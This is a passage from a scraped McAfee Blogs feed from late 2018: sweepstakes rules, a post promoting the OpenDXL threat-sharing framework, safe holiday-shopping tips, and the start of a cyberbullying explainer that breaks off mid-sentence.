For the McAfee Holiday Shopping #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and hashtags.
  4. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee Holiday Shopping #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Tuesday, December 11, 2018 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   

3. Eligibility: 

McAfee Holiday Shopping #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee Holiday Shopping #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee Holiday Shopping #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible. 

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Holiday Shopping #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Holiday Shopping #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification:  

Each winner will be notified via direct message (“DM”) on Twitter.com by December 11, 2018. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee Holiday Shopping #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee Holiday Shopping #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Holiday Shopping #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Holiday Shopping #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Holiday Shopping #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Holiday Shopping #RT2Win Sweepstakes-related activity, or participation in the McAfee Holiday Shopping #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  • To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  • Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.
9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Holiday Shopping #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Holiday Shopping #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with these sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Holiday Shopping #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after November 26, 2018 before December 9, 2018, to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/holiday-shopping-rt2win-2018/feed/ 0
Are You Sharing in this Cyberwarfare? https://securingtomorrow.mcafee.com/business/are-you-sharing-in-this-cyberwarfare/ https://securingtomorrow.mcafee.com/business/are-you-sharing-in-this-cyberwarfare/#respond Mon, 26 Nov 2018 16:00:08 +0000 https://securingtomorrow.mcafee.com/?p=92802

If your organization is, you can win on a couple fronts… In traditional warfare, information sharing is key. The notion of sharing insight on your opponent is extremely valuable and cannot be underestimated. The basic principles in Sun Tzu’s The Art of War state you must know yourself and know your opponent to be successful. […]

The post Are You Sharing in this Cyberwarfare? appeared first on McAfee Blogs.

]]>

If your organization is, you can win on a couple fronts…

In traditional warfare, information sharing is key. The notion of sharing insight on your opponent is extremely valuable and cannot be underestimated. The basic principles in Sun Tzu’s The Art of War state you must know yourself and know your opponent to be successful. Cyberwarfare is no different. Information is obtained and exchanged to gain the upper hand. Translating to cybersecurity, you must know your vulnerabilities; understand the attackers’ tactics; and leverage a vulnerability (system or user), deception, hiding tactics, and strike efforts at an unexpected time and location. Sharing this insight is crucial to establishing detection and protection strategies. Just start with your current infrastructure sharing insight. Imagine your IT and security functions working together to protect your environment. Consider if critical vulnerability information is shared with your endpoint security or if network security blocks suspicious users or devices to detect and confine highly vulnerable devices. Maximizing your IT infrastructure to coordinate efforts will deter the creative attacker.

Basics of cybersharing

Cybersharing discussions begin with essential cybersharing framework components that address the why and the what:

  • Identify the problem to be solved
  • List the functions or products involved
  • Simply describe what you want to happen
  • Map these actions to one of four key capabilities (receive an event, ask a question, take action, and publish an event)

Using a robust cybersecurity sharing framework takes the technical heavy lifting out of integrations, allowing you to focus on what’s important. Cybersharing begins with understanding the problem you are trying to solve (such as blocking a non-compliant endpoint from your network), knowing what products are involved (endpoint solution or a Network Access Control solution), understanding what you want to have happen (if an endpoint is incorrectly configured, be sure to restrict its network access), and mapping these to framework capabilities (ask the endpoint a question on its configuration status, transmit this status to the Network Access Control solution, and depending on the status, allow or block). It’s really that simple, automated, and effective.

(on the side) Integrating security tools can improve your response time by 20% (MSI Research, 2018).

Highs and lows of cybersharing

Cybersharing is not a new concept. The industry has been working on it for a while with many stakeholders. Many initiatives have come and gone in the past—the industry has always clamored for it, but it has often fallen into the “too hard” or “too expensive” bracket. Until now. There is now a belief among security vendors that we cannot do everything with just one vendor. Sharing is essential to defending our environments and defeating our adversaries.

A cybersharing option to consider

Sharing can be difficult and time-consuming. Just getting the connection to share the information may require writing to a proprietary API, which means lots of maintenance and manual efforts to add new connections. And once you have the connection, the information flow is daunting. Imagine a world where you simply share within your environment without the need to write to proprietary APIs or write with prescribed data structures.

Enter Data Exchange Layer (DXL). DXL is an established and proven communication layer, allowing security functions and tools to share and collaborate information based on a messaging topic. It’s like real-time tweets, only in this context the “tweet” would be a piece of security information and the “followers” would be your security products.

Over 4,000 organizations are participating in OpenDXL, the open source initiative using DXL to interconnect security functions to coordinate defenses. This interconnection can be a one-to-many-systems ratio or a one-to-one. It may be a simple exchange of specific threat intelligence or threat insight with a recommended response. We feel open sourcing this framework is key to information sharing—no ties to a vendor, no lock-in, and no restrictions on who or what products can integrate with DXL.

Everything you need to get started is on OpenDXL.com—from the components, to pre-built development environments in Docker containers, to documentation and pre-built integrations (including in many cases the source code). Get started and elevate your security program today.

Taking cybersharing to new heights

It’s time to join the DXL challenge—the first cybersharing contest of its kind. We’re introducing a recognition program, DXL Super Stars, to share these critical DXL integrations that improve security efficiency and efficacy. Join the cybersharers and win cash! Don’t delay—submissions must be in by late January.

 

The post Are You Sharing in this Cyberwarfare? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/are-you-sharing-in-this-cyberwarfare/feed/ 0
8 Ways to Secure Your Family’s Online Holiday Shopping https://securingtomorrow.mcafee.com/consumer/family-safety/8-ways-to-secure-your-familys-online-holiday-shopping-fun/ https://securingtomorrow.mcafee.com/consumer/family-safety/8-ways-to-secure-your-familys-online-holiday-shopping-fun/#respond Mon, 26 Nov 2018 02:20:42 +0000 https://securingtomorrow.mcafee.com/?p=92805

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions. Before getting caught up in the whirlwind of gift giving and the thrill of […]

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

]]>

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/8-ways-to-secure-your-familys-online-holiday-shopping-fun/feed/ 0
The Who, What, and How of Cyberbullying https://securingtomorrow.mcafee.com/consumer/the-who-what-and-how-of-cyberbullying/ https://securingtomorrow.mcafee.com/consumer/the-who-what-and-how-of-cyberbullying/#respond Wed, 21 Nov 2018 17:35:07 +0000 https://securingtomorrow.mcafee.com/?p=92813

The internet has allowed society to stay connected in more ways than ever before. We can speak to strangers across the globe, connect with loved ones in an instant, and share our lives publicly. As much as the internet has connected us in positive, eye-opening ways, its interactive nature has also created a new problem […]

The post The Who, What, and How of Cyberbullying appeared first on McAfee Blogs.

]]>

The internet has allowed society to stay connected in more ways than ever before. We can speak to strangers across the globe, connect with loved ones in an instant, and share our lives publicly. As much as the internet has connected us in positive, eye-opening ways, its interactive nature has also created a new problem for active users everywhere – cyberbullying. Though the problem is becoming all too common, many out there don’t fully understand the ins and outs of cyberbullying. Let’s take a deep dive into the phenomenon.

What is Cyberbullying

Just like it sounds, cyberbullying is when bullies take their insults and ill will to the internet. According to StopBullying.gov, “Cyberbullying is bullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, Text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else.” The key objective of cyberbullying is to embarrass the subject of the attack, though sometimes the bully can view the act as justified revenge or simply non-intentional.

Types of Cyberbullies

Evolved from the classic schoolyard bullies of old, these cyberbullies can actually take a variety of forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak/other victims, and often take the action to protect a loved or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there’s the Inadvertent Cyberbully, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite – and take their online actions in order to impress a group of friends or gain social status.

Cyberbullying Methods

Not only is there a variety in the kind of bullies across the web, but also a plethora of types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s Harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.

Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples popping up everywhere, from high students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping 5 years.

Next Steps for Both Parents and Kids

Typically, cyberbullying is a common occurrence amongst teens who are navigating the trials and tribulations of middle school and high school. But that doesn’t mean its exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can do to stop cyberbullying in its tracks.

If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, do whatever you can do have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources/hotlines/support to aid with your issue.

If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything that’s happeni